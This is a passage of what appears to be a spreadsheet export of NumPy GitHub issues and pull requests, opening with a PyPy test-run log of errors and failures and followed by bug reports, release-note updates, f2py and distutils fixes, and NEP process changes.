  File "x:\pypy3\lib-python\3\shutil.py", line 389, in _rmtree_unsafe_x000D_
    onerror(os.unlink, fullname, sys.exc_info())_x000D_
  File "x:\pypy3\lib-python\3\shutil.py", line 387, in _rmtree_unsafe_x000D_
    os.unlink(fullname)_x000D_
PermissionError: [WinError 32] The process cannot access the file because it is being used by another process: 'C:\\Users\\X\\AppData\\Local\\Temp\\tmpfd046wbj\\mmapu9uhq5io'_x000D_
_x000D_
======================================================================_x000D_
ERROR: numpy.core.tests.test_memmap.TestMemmap.test_open_with_filename_x000D_
----------------------------------------------------------------------_x000D_
Traceback (most recent call last):_x000D_
  File "x:\pypy3\site-packages\nose\case.py", line 385, in tearDown_x000D_
    try_run(self.inst, ('teardown', 'tearDown'))_x000D_
  File "x:\pypy3\site-packages\nose\util.py", line 471, in try_run_x000D_
    return func()_x000D_
  File "x:\pypy3\site-packages\numpy\core\tests\test_memmap.py", line 30, in teardown_x000D_
    shutil.rmtree(self.tempdir)_x000D_
  File "x:\pypy3\lib-python\3\shutil.py", line 494, in rmtree_x000D_
    return _rmtree_unsafe(path, onerror)_x000D_
  File "x:\pypy3\lib-python\3\shutil.py", line 389, in _rmtree_unsafe_x000D_
    onerror(os.unlink, fullname, sys.exc_info())_x000D_
  File "x:\pypy3\lib-python\3\shutil.py", line 387, in _rmtree_unsafe_x000D_
    os.unlink(fullname)_x000D_
PermissionError: [WinError 32] The process cannot access the file because it is being used by another process: 'C:\\Users\\X\\AppData\\Local\\Temp\\tmpp5k0m6aq\\mmap85i65gqo'_x000D_
_x000D_
======================================================================_x000D_
ERROR: numpy.core.tests.test_memmap.TestMemmap.test_path_x000D_
----------------------------------------------------------------------_x000D_
Traceback (most recent call last):_x000D_
  File "x:\pypy3\site-packages\nose\case.py", line 385, in tearDown_x000D_
    try_run(self.inst, ('teardown', 'tearDown'))_x000D_
  File "x:\pypy3\site-packages\nose\util.py", line 471, in try_run_x000D_
    return func()_x000D_
  File "x:\pypy3\site-packages\numpy\core\tests\test_memmap.py", line 30, in teardown_x000D_
    shutil.rmtree(self.tempdir)_x000D_
  File "x:\pypy3\lib-python\3\shutil.py", line 494, in rmtree_x000D_
    return _rmtree_unsafe(path, onerror)_x000D_
  File "x:\pypy3\lib-python\3\shutil.py", line 389, in _rmtree_unsafe_x000D_
    onerror(os.unlink, fullname, sys.exc_info())_x000D_
  File "x:\pypy3\lib-python\3\shutil.py", line 387, in _rmtree_unsafe_x000D_
    os.unlink(fullname)_x000D_
PermissionError: [WinError 32] The process cannot access the file because it is being used by another process: 'C:\\Users\\X\\AppData\\Local\\Temp\\tmpt1qxrgv8\\mmapbaplj7z9'_x000D_
_x000D_
======================================================================_x000D_
ERROR: test suite for &lt;module 'numpy.lib.tests.test_format' from 'x:\\pypy3\\site-packages\\numpy\\lib\\tests\\test_format.py'&gt;_x000D_
----------------------------------------------------------------------_x000D_
Traceback (most recent call last):_x000D_
  File "x:\pypy3\site-packages\nose\suite.py", line 229, in run_x000D_
    self.tearDown()_x000D_
  File "x:\pypy3\site-packages\nose\suite.py", line 352, in tearDown_x000D_
    self.teardownContext(ancestor)_x000D_
  File "x:\pypy3\site-packages\nose\suite.py", line 368, in teardownContext_x000D_
    try_run(context, names)_x000D_
  File "x:\pypy3\site-packages\nose\util.py", line 471, in try_run_x000D_
    return func()_x000D_
  File "x:\pypy3\site-packages\numpy\lib\tests\test_format.py", line 307, in teardown_module_x000D_
    shutil.rmtree(tempdir)_x000D_
  File "x:\pypy3\lib-python\3\shutil.py", line 494, in rmtree_x000D_
    return _rmtree_unsafe(path, onerror)_x000D_
  File "x:\pypy3\lib-python\3\shutil.py", line 389, in _rmtree_unsafe_x000D_
    onerror(os.unlink, fullname, sys.exc_info())_x000D_
  File "x:\pypy3\lib-python\3\shutil.py", line 387, in _rmtree_unsafe_x000D_
    os.unlink(fullname)_x000D_
PermissionError: [WinError 32] The process cannot access the file because it is being used by another process: 'C:\\Users\\X\\AppData\\Local\\Temp\\tmpygq4rrmv\\compressed.npz'_x000D_
_x000D_
======================================================================_x000D_
ERROR: numpy.lib.tests.test_function_base.TestAdd_newdoc.test_add_doc_x000D_
----------------------------------------------------------------------_x000D_
Traceback (most recent call last):_x000D_
  File "x:\pypy3\site-packages\nose\case.py", line 198, in runTest_x000D_
    self.test(*self.arg)_x000D_
  File "x:\pypy3\site-packages\numpy\testing\nose_tools\decorators.py", line 147, in skipper_func_x000D_
    return f(*args, **kwargs)_x000D_
  File "x:\pypy3\site-packages\numpy\lib\tests\test_function_base.py", line 3492, in test_add_doc_x000D_
    assert_equal(np.core.flatiter.index.__doc__[:len(tgt)], tgt)_x000D_
TypeError: 'NoneType' object is not subscriptable_x000D_
_x000D_
======================================================================_x000D_
ERROR: numpy.lib.tests.test_io.TestLoadTxt.test_1D_x000D_
----------------------------------------------------------------------_x000D_
Traceback (most recent call last):_x000D_
  File "x:\pypy3\site-packages\nose\case.py", line 198, in runTest_x000D_
    self.test(*self.arg)_x000D_
  File "x:\pypy3\site-packages\numpy\lib\tests\test_io.py", line 645, in test_1D_x000D_
    x = np.loadtxt(c, dtype=int)_x000D_
  File "x:\pypy3\site-packages\numpy\lib\npyio.py", line 1099, in loadtxt_x000D_
    X.resize(nshape)_x000D_
ValueError: cannot resize an array with refcheck=True on PyPy._x000D_
Use the resize function or refcheck=False_x000D_
_x000D_
======================================================================_x000D_
ERROR: numpy.lib.tests.test_io.TestLoadTxt.test_binary_load_x000D_
----------------------------------------------------------------------_x000D_
Traceback (most recent call last):_x000D_
  File "x:\pypy3\site-packages\nose\case.py", line 198, in runTest_x000D_
    self.test(*self.arg)_x000D_
  File "x:\pypy3\site-packages\numpy\testing\nose_tools\decorators.py", line 147, in skipper_func_x000D_
    return f(*args, **kwargs)_x000D_
  File "x:\pypy3\site-packages\numpy\lib\tests\test_io.py", line 1019, in test_binary_load_x000D_
    x = np.loadtxt(f, encoding="UTF-8", dtype=np.unicode)_x000D_
  File "x:\pypy3\site-packages\numpy\lib\npyio.py", line 1099, in loadtxt_x000D_
    X.resize(nshape)_x000D_
ValueError: cannot resize an array with refcheck=True on PyPy._x000D_
Use the resize function or refcheck=False_x000D_
_x000D_
======================================================================_x000D_
ERROR: numpy.lib.tests.test_io.TestLoadTxt.test_empty_field_after_tab_x000D_
----------------------------------------------------------------------_x000D_
Traceback (most recent call last):_x000D_
  File "x:\pypy3\site-packages\nose\case.py", line 198, in runTest_x000D_
    self.test(*self.arg)_x000D_
  File "x:\pypy3\site-packages\numpy\lib\tests\test_io.py", line 928, in test_empty_field_after_tab_x000D_
    x = np.loadtxt(c, dtype=dt, delimiter='\t')_x000D_
  File "x:\pypy3\site-packages\numpy\lib\npyio.py", line 1099, in loadtxt_x000D_
    X.resize(nshape)_x000D_
ValueError: cannot resize an array with refcheck=True on PyPy._x000D_
Use the resize function or refcheck=False_x000D_
_x000D_
======================================================================_x000D_
ERROR: numpy.lib.tests.test_io.TestLoadTxt.test_encoding_x000D_
----------------------------------------------------------------------_x000D_
Traceback (most recent call last):_x000D_
  File "x:\pypy3\site-packages\nose\case.py", line 198, in runTest_x000D_
    self.test(*self.arg)_x000D_
  File "x:\pypy3\site-packages\numpy\lib\tests\test_io.py", line 559, in test_encoding_x000D_
    x = self.loadfunc(path, encoding="UTF-16")_x000D_
  File "x:\pypy3\site-packages\numpy\lib\npyio.py", line 1099, in loadtxt_x000D_
    X.resize(nshape)_x000D_
ValueError: cannot resize an array with refcheck=True on PyPy._x000D_
Use the resize function or refcheck=False_x000D_
_x000D_
======================================================================_x000D_
ERROR: numpy.lib.tests.test_io.TestLoadTxt.test_from_float_hex_x000D_
----------------------------------------------------------------------_x000D_
Traceback (most recent call last):_x000D_
  File "x:\pypy3\site-packages\nose\case.py", line 198, in runTest_x000D_
    self.test(*self.arg)_x000D_
  File "x:\pypy3\site-packages\numpy\lib\tests\test_io.py", line 904, in test_from_float_hex_x000D_
    res = np.loadtxt(c, dtype=dt)_x000D_
  File "x:\pypy3\site-packages\numpy\lib\npyio.py", line 1099, in loadtxt_x000D_
    X.resize(nshape)_x000D_
ValueError: cannot resize an array with refcheck=True on PyPy._x000D_
Use the resize function or refcheck=False_x000D_
_x000D_
======================================================================_x000D_
ERROR: numpy.lib.tests.test_io.TestLoadTxt.test_generator_source_x000D_
----------------------------------------------------------------------_x000D_
Traceback (most recent call last):_x000D_
  File "x:\pypy3\site-packages\nose\case.py", line 198, in runTest_x000D_
    self.test(*self.arg)_x000D_
  File "x:\pypy3\site-packages\numpy\lib\tests\test_io.py", line 991, in test_generator_source_x000D_
    res = np.loadtxt(count())_x000D_
  File "x:\pypy3\site-packages\numpy\lib\npyio.py", line 1099, in loadtxt_x000D_
    X.resize(nshape)_x000D_
ValueError: cannot resize an array with refcheck=True on PyPy._x000D_
Use the resize function or refcheck=False_x000D_
_x000D_
======================================================================_x000D_
ERROR: numpy.lib.tests.test_io.TestLoadTxt.test_ndmin_keyword_x000D_
----------------------------------------------------------------------_x000D_
Traceback (most recent call last):_x000D_
  File "x:\pypy3\site-packages\nose\case.py", line 198, in runTest_x000D_
    self.test(*self.arg)_x000D_
  File "x:\pypy3\site-packages\numpy\lib\tests\test_io.py", line 970, in test_ndmin_keyword_x000D_
    x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=2)_x000D_
  File "x:\pypy3\site-packages\numpy\lib\npyio.py", line 1099, in loadtxt_x000D_
    X.resize(nshape)_x000D_
ValueError: cannot resize an array with refcheck=True on PyPy._x000D_
Use the resize function or refcheck=False_x000D_
_x000D_
======================================================================_x000D_
ERROR: Failure: OSError (no file with expected extension)_x000D_
----------------------------------------------------------------------_x000D_
Traceback (most recent call last):_x000D_
  File "x:\pypy3\site-packages\nose\failure.py", line 39, in runTest_x000D_
    raise self.exc_val.with_traceback(self.tb)_x000D_
  File "x:\pypy3\site-packages\nose\loader.py", line 418, in loadTestsFromName_x000D_
    addr.filename, addr.module)_x000D_
  File "x:\pypy3\site-packages\nose\importer.py", line 47, in importFromPath_x000D_
    return self.importFromDir(dir_path, fqname)_x000D_
  File "x:\pypy3\site-packages\nose\importer.py", line 94, in importFromDir_x000D_
    mod = load_module(part_fqname, fh, filename, desc)_x000D_
  File "x:\pypy3\lib-python\3\imp.py", line 234, in load_module_x000D_
    return load_source(name, filename, file)_x000D_
  File "x:\pypy3\lib-python\3\imp.py", line 172, in load_source_x000D_
    module = _load(spec)_x000D_
  File "&lt;frozen importlib._bootstrap&gt;", line 694, in _load_x000D_
  File "&lt;frozen importlib._bootstrap&gt;", line 674, in _load_unlocked_x000D_
  File "&lt;builtin&gt;/frozen importlib._bootstrap_external", line 686, in exec_module_x000D_
  File "&lt;frozen importlib._bootstrap&gt;", line 223, in _call_with_frames_removed_x000D_
  File "x:\pypy3\site-packages\numpy\tests\test_ctypeslib.py", line 18, in &lt;module&gt;_x000D_
    cdll = load_library('multiarray', np.core.multiarray.__file__)_x000D_
  File "x:\pypy3\site-packages\numpy\ctypeslib.py", line 155, in load_library_x000D_
    raise OSError("no file with expected extension")_x000D_
OSError: no file with expected extension_x000D_
_x000D_
======================================================================_x000D_
ERROR: numpy.tests.test_scripts.test_f2py_x000D_
----------------------------------------------------------------------_x000D_
Traceback (most recent call last):_x000D_
  File "x:\pypy3\site-packages\nose\case.py", line 198, in runTest_x000D_
    self.test(*self.arg)_x000D_
  File "x:\pypy3\site-packages\numpy\testing\nose_tools\decorators.py", line 147, in skipper_func_x000D_
    return f(*args, **kwargs)_x000D_
  File "x:\pypy3\site-packages\numpy\tests\test_scripts.py", line 72, in test_f2py_x000D_
    code, stdout, stderr = run_command([sys.executable, f2py_cmd, '-v'])_x000D_
  File "x:\pypy3\site-packages\numpy\tests\test_scripts.py", line 57, in run_command_x000D_
    'stderr', '------', '{2}']).format(cmd, stdout, stderr))_x000D_
RuntimeError: Command "['x:\\pypy3\\pypy3.exe', 'x:\\pypy3\\Scripts\\f2py.py', '-v']" failed with_x000D_
stdout_x000D_
------_x000D_
b''_x000D_
_x000D_
stderr_x000D_
------_x000D_
b"FileNotFoundError: [Errno 2] No such file or directory: 'x:\\\\pypy3\\\\Scripts\\\\f2py.py'\n"_x000D_
_x000D_
======================================================================_x000D_
FAIL: numpy.core.tests.test_nditer.TestIterNested.test_dtype_copy_x000D_
----------------------------------------------------------------------_x000D_
Traceback (most recent call last):_x000D_
  File "x:\pypy3\site-packages\nose\case.py", line 198, in runTest_x000D_
    self.test(*self.arg)_x000D_
  File "x:\pypy3\site-packages\numpy\core\tests\test_nditer.py", line 2302, in test_dtype_copy_x000D_
    assert_equal(a, [[1, 2, 3], [4, 5, 6]])_x000D_
  File "x:\pypy3\site-packages\numpy\testing\nose_tools\utils.py", line 344, in assert_equal_x000D_
    return assert_array_equal(actual, desired, err_msg, verbose)_x000D_
  File "x:\pypy3\site-packages\numpy\testing\nose_tools\utils.py", line 855, in assert_array_equal_x000D_
    verbose=verbose, header='Arrays are not equal')_x000D_
  File "x:\pypy3\site-packages\numpy\testing\nose_tools\utils.py", line 779, in assert_array_compare_x000D_
    raise AssertionError(msg)_x000D_
AssertionError:_x000D_
Arrays are not equal_x000D_
_x000D_
(mismatch 100.0%)_x000D_
 x: array([[0., 1., 2.],_x000D_
       [3., 4., 5.]], dtype=float32)_x000D_
 y: array([[1, 2, 3],_x000D_
       [4, 5, 6]])_x000D_
_x000D_
======================================================================_x000D_
FAIL: numpy.core.tests.test_nditer.test_iter_nbo_align_contig_x000D_
----------------------------------------------------------------------_x000D_
Traceback (most recent call last):_x000D_
  File "x:\pypy3\site-packages\nose\case.py", line 198, in runTest_x000D_
    self.test(*self.arg)_x000D_
  File "x:\pypy3\site-packages\numpy\core\tests\test_nditer.py", line 790, in test_iter_nbo_align_contig_x000D_
    assert_equal(au, [2]*6)_x000D_
  File "x:\pypy3\site-packages\numpy\testing\nose_tools\utils.py", line 344, in assert_equal_x000D_
    return assert_array_equal(actual, desired, err_msg, verbose)_x000D_
  File "x:\pypy3\site-packages\numpy\testing\nose_tools\utils.py", line 855, in assert_array_equal_x000D_
    verbose=verbose, header='Arrays are not equal')_x000D_
  File "x:\pypy3\site-packages\numpy\testing\nose_tools\utils.py", line 779, in assert_array_compare_x000D_
    raise AssertionError(msg)_x000D_
AssertionError:_x000D_
Arrays are not equal_x000D_
_x000D_
(mismatch 83.33333333333333%)_x000D_
 x: array([0., 1., 2., 3., 4., 5.], dtype=float32)_x000D_
 y: array([2, 2, 2, 2, 2, 2])_x000D_
_x000D_
======================================================================_x000D_
FAIL: numpy.core.tests.test_nditer.test_iter_array_cast_x000D_
----------------------------------------------------------------------_x000D_
Traceback (most recent call last):_x000D_
  File "x:\pypy3\site-packages\nose\case.py", line 198, in runTest_x000D_
    self.test(*self.arg)_x000D_
  File "x:\pypy3\site-packages\numpy\core\tests\test_nditer.py", line 882, in test_iter_array_cast_x000D_
    assert_equal(a[2, 1, 1], -12.5)_x000D_
  File "x:\pypy3\site-packages\numpy\testing\nose_tools\utils.py", line 411, in assert_equal_x000D_
    raise AssertionError(msg)_x000D_
AssertionError:_x000D_
Items are not equal:_x000D_
 ACTUAL: 18.0_x000D_
 DESIRED: -12.5_x000D_
_x000D_
======================================================================_x000D_
FAIL: Strings containing an unrepresentable float overflow_x000D_
----------------------------------------------------------------------_x000D_
Traceback (most recent call last):_x000D_
  File "x:\pypy3\site-packages\nose\case.py", line 198, in runTest_x000D_
    self.test(*self.arg)_x000D_
  File "x:\pypy3\site-packages\numpy\core\tests\test_scalar_ctors.py", line 34, in test_floating_overflow_x000D_
    flongdouble = assert_warns(RuntimeWarning, np.longdouble, '1e10000')_x000D_
  File "x:\pypy3\site-packages\numpy\testing\nose_tools\utils.py", line 1731, in assert_warns_x000D_
    return func(*args, **kwargs)_x000D_
  File "x:\pypy3\lib-python\3\contextlib.py", line 66, in __exit___x000D_
    next(self.gen)_x000D_
  File "x:\pypy3\site-packages\numpy\testing\nose_tools\utils.py", line 1688, in _assert_warns_context_x000D_
    raise AssertionError("No warning raised" + name_str)_x000D_
AssertionError: No warning raised when calling float64_x000D_
_x000D_
======================================================================_x000D_
FAIL: numpy.lib.tests.test_io.test_load_refcount_x000D_
----------------------------------------------------------------------_x000D_
Traceback (most recent call last):_x000D_
  File "x:\pypy3\site-packages\nose\case.py", line 198, in runTest_x000D_
    self.test(*self.arg)_x000D_
  File "x:\pypy3\site-packages\numpy\lib\tests\test_io.py", line 2368, in test_load_refcount_x000D_
    assert_(gc.isenabled())_x000D_
  File "x:\pypy3\site-packages\numpy\testing\nose_tools\utils.py", line 93, in assert__x000D_
    raise AssertionError(smsg)_x000D_
AssertionError_x000D_
_x000D_
----------------------------------------------------------------------_x000D_
Ran 6343 tests in 135.580s_x000D_
_x000D_
FAILED (KNOWNFAIL=19, SKIP=22, errors=16, failures=5)_x000D_
&lt;nose.result.TextTestResult run=6343 errors=16 failures=5&gt;_x000D_
```</t>
  </si>
  <si>
    <t>numpy-1.14.2+mkl-pp3510-pp3510-win32 test errors/failures</t>
  </si>
  <si>
    <t>* Add 1.14.2 changelog_x000D_
* Add 1.14.2 release notes</t>
  </si>
  <si>
    <t>DOC: Post 1.14.2 release update.</t>
  </si>
  <si>
    <t>Fixes #10646_x000D_
_x000D_
It seems the original intent was to disable builds when _only_ the `egg_info` target is requested, not whenever it is _one of_ the targets._x000D_
_x000D_
It's kinda gross that we're adding a second layer of (fragile) argument parsing to setuptools here, but that something to address another time._x000D_
_x000D_
Not a regression, but it would be nice to slip it into the next release.</t>
  </si>
  <si>
    <t>BUG: Fix `setup.py build install egg_info`, which did not previously build</t>
  </si>
  <si>
    <t>Backport of #10716</t>
  </si>
  <si>
    <t>BUG: dragon4 fractional output mode adds too many trailing zeros (1.14 backport)</t>
  </si>
  <si>
    <t>The accidental trailing underscore made it render as unresolved link so it had an underline in the output. None of the other listed functions had such a trailing underscore so I removed it.</t>
  </si>
  <si>
    <t>DOC: Fix minor typo in how-to-document.</t>
  </si>
  <si>
    <t>['03 - Maintenance', '04 - Documentation', 'component: Documentation']</t>
  </si>
  <si>
    <t>[ci skip]</t>
  </si>
  <si>
    <t>DOC: Create 1.14.2 notes and changelog.</t>
  </si>
  <si>
    <t>**DO NOT MERGE**_x000D_
_x000D_
For application to releases only._x000D_
_x000D_
This reverts #10676 and #10708. Those fixes to f2py exposed an error in_x000D_
a SciPy *.pyf file with the result that SciPy versions &lt; 1.0.1 could not_x000D_
be compiled with NumPy master. This reversion is only for NumPy releases_x000D_
made prior to SciPy 1.2.0, meanwhile the fix remains in master._x000D_
_x000D_
EDIT:_x000D_
_x000D_
* Removes `numpy/f2py/tests/test_quoted_character.py`_x000D_
* Removes `def split_by_unquoted` from `crackfortran.py`</t>
  </si>
  <si>
    <t>WIP, REL, REV: Revert f2py fixes that exposed SciPy bug.</t>
  </si>
  <si>
    <t>['14 - Release', 'component: numpy.f2py']</t>
  </si>
  <si>
    <t>Fixes #10648, regression in #9971_x000D_
_x000D_
NPY_VISIBILITY_HIDDEN is used by memoverlap.{c,h}, so we should be using the same thing here_x000D_
_x000D_
CircleCI fails because this is based on the commit that introduced the regression</t>
  </si>
  <si>
    <t>BUG: Fix missing NPY_VISIBILITY_HIDDEN on npy_longdouble_to_PyLong</t>
  </si>
  <si>
    <t>['00 - Bug', 'component: build', 'component: numpy.core']</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #10657._x000D_
_x000D_
F2py generates code that uses PyTuple_SetItem on a tuple that has been_x000D_
"used", which is invalid on Pypy._x000D_
_x000D_
Add #ifdefs that make the generated code convert the object to a list,_x000D_
use PyList_SetItem, and then convert it back to a tuple._x000D_
</t>
  </si>
  <si>
    <t>BUG: Fix f2py generated code to work on PyPy</t>
  </si>
  <si>
    <t>['00 - Bug', '08 - Backport', 'component: numpy.f2py']</t>
  </si>
  <si>
    <t>Fixes #10713 _x000D_
_x000D_
There was a miscalculation in the number of trailing zeros to add when using `format_float_positional` with the option `fractional=False`, which specifies that the `precision` parameter refers to the total number of digits, not the number of fractional digits._x000D_
_x000D_
In that case we should be adding enough zeros so that `precision` equals the total number of digits; instead it was adding zeros so that precision equaled the number of fractional digits.</t>
  </si>
  <si>
    <t>BUG: dragon4 fractional output mode adds too many trailing zeros</t>
  </si>
  <si>
    <t>In Matlab there is a function cdf2rdf (https://www.mathworks.com/help/matlab/ref/cdf2rdf.html) which converts a complex diagonal form of eigenvalues and eigenvectors to a real diagonal form._x000D_
I didn't find the similar one in numpy, and it would be quite useful for developing numerical models that are used to solve hyperbolic systems._x000D_
Any chance this could be added in the future versions?_x000D_
If not, can you recommend some alternatives and/or how to implement it myself?</t>
  </si>
  <si>
    <t>[feature request] Convert complex diagonal form to real block diagonal form</t>
  </si>
  <si>
    <t>['01 - Enhancement']</t>
  </si>
  <si>
    <t>Fixes gh-9968_x000D_
_x000D_
Needs tests yet, which I can't write without access to a platform with `longdouble` having higher precision than `double`.</t>
  </si>
  <si>
    <t>BUG: longdouble(int) does not work</t>
  </si>
  <si>
    <t>_x000D_
* Update print statements in tools/swig/test/testSuperTensor.py._x000D_
* Fix deprecated escaped characters in numpy/linalg/lapack_lite/clapack_scrub.py.</t>
  </si>
  <si>
    <t>MAINT: Misc small fixes.</t>
  </si>
  <si>
    <t>['03 - Maintenance', 'component: numpy.linalg', 'component: swig']</t>
  </si>
  <si>
    <t>BUG: distutils: Remove named templates from the processed output (fix gh-10712)</t>
  </si>
  <si>
    <t>DOC: add documentation for constants</t>
  </si>
  <si>
    <t>['04 - Documentation', 'component: Documentation', 'component: numpy.core']</t>
  </si>
  <si>
    <t>This PR should fix issue #10697, where there were issues with `assert_array_almost_equal_nulp` for `float16` datatypes._x000D_
_x000D_
This is my first NumPy PR, so if anything is off, feel free to let me know and I'll happily correct.</t>
  </si>
  <si>
    <t>BUG: Fix bug in asserting near equality of float16 arrays.</t>
  </si>
  <si>
    <t>Hello :)</t>
  </si>
  <si>
    <t>MAINT: Fixed C++ guard in f2py test.</t>
  </si>
  <si>
    <t>['03 - Maintenance', 'component: numpy.f2py']</t>
  </si>
  <si>
    <t>Initially this problem was reported as https://github.com/scipy/scipy/issues/8539, where you can see an example of the issue.  It turns out the problem is in numpy/distutils._x000D_
_x000D_
Here's a simple example.  The file `foo.pyf.src` is:_x000D_
```_x000D_
python module foo_x000D_
    &lt;_rd=real,double precision&gt;_x000D_
    interface_x000D_
        subroutine &lt;s,d&gt;foosub(tol)_x000D_
            &lt;_rd&gt;, intent(in,out) :: tol_x000D_
        end subroutine &lt;s,d&gt;foosub_x000D_
    end interface_x000D_
end python module foo_x000D_
```_x000D_
When this file is processed by `numpy/numpy/distutils/from_template.py`, the result is_x000D_
```_x000D_
python module foo_x000D_
    &lt;_rd=real,double precision&gt;_x000D_
    interface_x000D_
        subroutine sfoosub(tol)_x000D_
            real, intent(in,out) :: tol_x000D_
        end subroutine sfoosub_x000D_
_x000D_
        subroutine dfoosub(tol)_x000D_
            double precision, intent(in,out) :: tol_x000D_
        end subroutine dfoosub_x000D_
_x000D_
_x000D_
    end interface_x000D_
end python module foo_x000D_
```_x000D_
The problem is that the line `&lt;_rd=real,double precision&gt;` has been copied to the output file.  If you process that file with `f2py`, you'll get a warning message stating `crackline:1: No pattern for line`.</t>
  </si>
  <si>
    <t>BUG: distutils: Template processing doesn't remove the definition of the "loop variables".</t>
  </si>
  <si>
    <t>Mostly fixing hard tabs that have crept into the source files. The generated lapack_lite files also have a lot of hard tabs, but those are left unchanged.</t>
  </si>
  <si>
    <t>MAINT: Hard tab and whitespace cleanup.</t>
  </si>
  <si>
    <t>Error message currently refers to `choicelist`, but actually refers to a value error in `condlist`. Also added index of erroneous argument to error message.</t>
  </si>
  <si>
    <t>BUG: fix error message in numpy.select</t>
  </si>
  <si>
    <t>This fix includes the patch as suggested by @WarrenWeckesser in #10676 and a basic regression test.</t>
  </si>
  <si>
    <t>BUG: fix problem with modifing pyf lines containing ';' in f2py</t>
  </si>
  <si>
    <t>['00 - Bug', 'component: numpy.f2py']</t>
  </si>
  <si>
    <t>I have an issue using numpy 1.10.4 with python 3.5.0._x000D_
_x000D_
Numpy installed with conda on windows 10_x000D_
_x000D_
```_x000D_
(testenv) C:\WINDOWS\system32&gt;python_x000D_
Python 3.5.0 |Continuum Analytics, Inc.| (default, Dec  1 2015, 11:46:22) [MSC v.1900 64 bit (AMD64)] on win32_x000D_
Type "help", "copyright", "credits" or "license" for more information._x000D_
&gt;&gt;&gt; import numpy_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
  File "C:\ProgramData\Anaconda3\envs\testenv\lib\site-packages\numpy\__init__.py", line 112, in &lt;module&gt;_x000D_
    from ._globals import ModuleDeprecationWarning, VisibleDeprecationWarning_x000D_
ImportError: No module named 'numpy._globals'_x000D_
```</t>
  </si>
  <si>
    <t>numpy 1.10.4 : No module named 'numpy._globals'</t>
  </si>
  <si>
    <t>NEP: New NEP for identifying and coercing duck arrays</t>
  </si>
  <si>
    <t>Note to self: still need to add this to index.rst, but maybe better to
wait until after #10703 is merged.</t>
  </si>
  <si>
    <t>NEP 15: Merging multiarray and umath</t>
  </si>
  <si>
    <t>- Write down a formal procedure for declaring a NEP "accepted"
- Assign numbers to all existing NEPs</t>
  </si>
  <si>
    <t>MAINT:  NEP process updates</t>
  </si>
  <si>
    <t>['01 - Enhancement', '04 - Documentation', 'component: NEP']</t>
  </si>
  <si>
    <t>This PR uses CircleCI to deploy the NumPy NEP and development documentation to http://www.numpy.org/neps and http://www.numpy.org/devdocs respectively.  For doing so, we also add a tool that pushes files from a provided directory into a remote repository, overwriting the content there._x000D_
_x000D_
The PR also addresses a problem in the masked array documentation, where docstrings are altered dynamically and sometimes introduces multiple `Notes` sections.</t>
  </si>
  <si>
    <t>TST, DOC: Upload devdocs and neps after circleci build</t>
  </si>
  <si>
    <t>This is a small tweak, following up from #10547._x000D_
_x000D_
As noted there, I still think the origin of this formula is a little unclear, since I didn't see it in the listed references, as also discussed here: #8446. But that's a question for another time.</t>
  </si>
  <si>
    <t>DOC: Grammar of np.gradient docstring</t>
  </si>
  <si>
    <t>Fixes #10663 _x000D_
_x000D_
Forward-Port of #10674</t>
  </si>
  <si>
    <t>BUG: Further back-compat fix for subclassed array repr (forward port)</t>
  </si>
  <si>
    <t>In current master, some astropy test failures occur, whose origin I still do not understand, but which bring up a bug that I think is long-standing (well, at least it is present in 1.13.3 as well):_x000D_
```_x000D_
assert_array_almost_equal_nulp(np.array(1., dtype=np.float16), np.array(2., dtype=np.float16))_x000D_
---------------------------------------------------------------------------_x000D_
ValueError                                Traceback (most recent call last)_x000D_
&lt;ipython-input-5-32ee107e5a67&gt; in &lt;module&gt;()_x000D_
----&gt; 1 assert_array_almost_equal_nulp(np.array(1., dtype=np.float16), np.array(2., dtype=np.float16))_x000D_
_x000D_
/data/mhvk/venv/numpy-dev/lib/python3.6/site-packages/numpy-1.15.0.dev0+400607b-py3.6-linux-x86_64.egg/numpy/testing/nose_tools/utils.py in assert_array_almost_equal_nulp(x, y, nulp)_x000D_
   1455             msg = "X and Y are not equal to %d ULP" % nulp_x000D_
   1456         else:_x000D_
-&gt; 1457             max_nulp = np.max(nulp_diff(x, y))_x000D_
   1458             msg = "X and Y are not equal to %d ULP (max is %g)" % (nulp, max_nulp)_x000D_
   1459         raise AssertionError(msg)_x000D_
_x000D_
/data/mhvk/venv/numpy-dev/lib/python3.6/site-packages/numpy-1.15.0.dev0+400607b-py3.6-linux-x86_64.egg/numpy/testing/nose_tools/utils.py in nulp_diff(x, y, dtype)_x000D_
   1554         return np.abs(diff)_x000D_
   1555 _x000D_
-&gt; 1556     rx = integer_repr(x)_x000D_
   1557     ry = integer_repr(y)_x000D_
   1558     return _diff(rx, ry, t)_x000D_
_x000D_
/data/mhvk/venv/numpy-dev/lib/python3.6/site-packages/numpy-1.15.0.dev0+400607b-py3.6-linux-x86_64.egg/numpy/testing/nose_tools/utils.py in integer_repr(x)_x000D_
   1583         return _integer_repr(x, np.int64, np.int64(-2**63))_x000D_
   1584     else:_x000D_
-&gt; 1585         raise ValueError("Unsupported dtype %s" % x.dtype)_x000D_
   1586 _x000D_
   1587 _x000D_
_x000D_
ValueError: Unsupported dtype float16_x000D_
```_x000D_
I think all that's needed to solve this is to include a stanza for `np.float16` in `integer_repr`.</t>
  </si>
  <si>
    <t>Bug in assert near equality of float16 arrays</t>
  </si>
  <si>
    <t>['00 - Bug', '05 - Testing', 'good first issue']</t>
  </si>
  <si>
    <t>My use case involves padding and im2col sorts of operations, and basically I'd like a way of doing `take from these indices, except when the value is -1, and then just take 0`. I.e. I'd like:_x000D_
_x000D_
```_x000D_
arr.take(-1)_x000D_
```_x000D_
_x000D_
to return `0` (or some other default value) regardless of `arr`. I understand I can do this with masks, but for me it'd be a little easier (and more efficient) as above and I imagine it'd be easy to implement as a new 'mode' to `take`. See if others think it's worthwhile._x000D_
_x000D_
Aside - it took me quite a while to debug some code as I thought the above was the expected behaviour for `mode='clip'`. When I tested it, my arrays happened to have `0` in the right location for it to appear to work as I expected. The docs don't seem to mention what happens with negative indices in this mode.</t>
  </si>
  <si>
    <t>default value for np.take(&lt;oob&gt;)</t>
  </si>
  <si>
    <t>['Proposal']</t>
  </si>
  <si>
    <t>See also 8a38f64.</t>
  </si>
  <si>
    <t>DOC: Improve docstring of memmap</t>
  </si>
  <si>
    <t>Apparently, this is easy to forget :).</t>
  </si>
  <si>
    <t>DOC: add versionadded for NDArrayOperatorsMixin.</t>
  </si>
  <si>
